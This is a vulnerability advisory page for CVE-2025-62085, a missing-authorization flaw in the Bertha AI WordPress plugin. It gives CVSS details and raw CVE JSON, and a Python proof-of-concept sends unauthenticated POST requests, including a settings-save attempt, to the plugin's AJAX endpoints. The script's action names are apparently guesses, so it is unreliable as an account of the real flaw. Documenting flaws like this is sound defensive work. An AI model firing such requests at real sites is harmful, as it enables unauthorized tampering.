Security Vulnerability Report
中文
CVE-2025-62085 CVSS 5.3 MEDIUM

CVE-2025-62085

Published: 2025-12-09 16:18:00
Last Modified: 2026-04-28 19:34:53

Description

Missing Authorization vulnerability in Bertha AI – Andrew Palmer BERTHA AI bertha-ai-free allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects BERTHA AI: from n/a through <= 1.13.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Bertha AI插件 <= 1.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-62085 PoC - Missing Authorization in Bertha AI Plugin # Target: WordPress site with Bertha AI plugin <= 1.13 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-62085 Missing Authorization vulnerability in Bertha AI plugin """ # Common Bertha AI AJAX endpoints that may be vulnerable vulnerable_endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/bertha-ai/v1/', ] # Test unauthenticated access to protected functionality # Replace 'action' with actual vulnerable action names from the plugin test_payloads = [ {'action': 'bertha_ai_get_content', 'post_id': '1'}, {'action': 'bertha_ai_save_settings', 'data': 'test'}, {'action': 'bertha_ai_generate_content', 'prompt': 'test'}, ] results = [] for endpoint in vulnerable_endpoints: url = target_url.rstrip('/') + endpoint for payload in test_payloads: try: response = requests.post(url, data=payload, timeout=10) # If response indicates successful access without auth if response.status_code == 200 and 'error' not in response.text.lower(): results.append(f"[+] Potential vulnerable endpoint: {url} with {payload}") except requests.RequestException as e: print(f"[-] Error testing {url}: {e}") return results if __name__ == '__main__': if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://example.com") sys.exit(1) target = sys.argv[1] print(f"[*] Scanning {target} for CVE-2025-62085...") findings = check_vulnerability(target) if findings: print("\n[!] Potential vulnerabilities found:") for finding in findings: print(finding) else: print("[*] No obvious vulnerabilities detected or target may be patched.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62085", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:00.360", "lastModified": "2026-04-28T19:34:52.737", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Bertha AI – Andrew Palmer BERTHA AI bertha-ai-free allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects BERTHA AI: from n/a through <= 1.13."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/bertha-ai-free/vulnerability/wordpress-bertha-ai-plugin-1-13-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}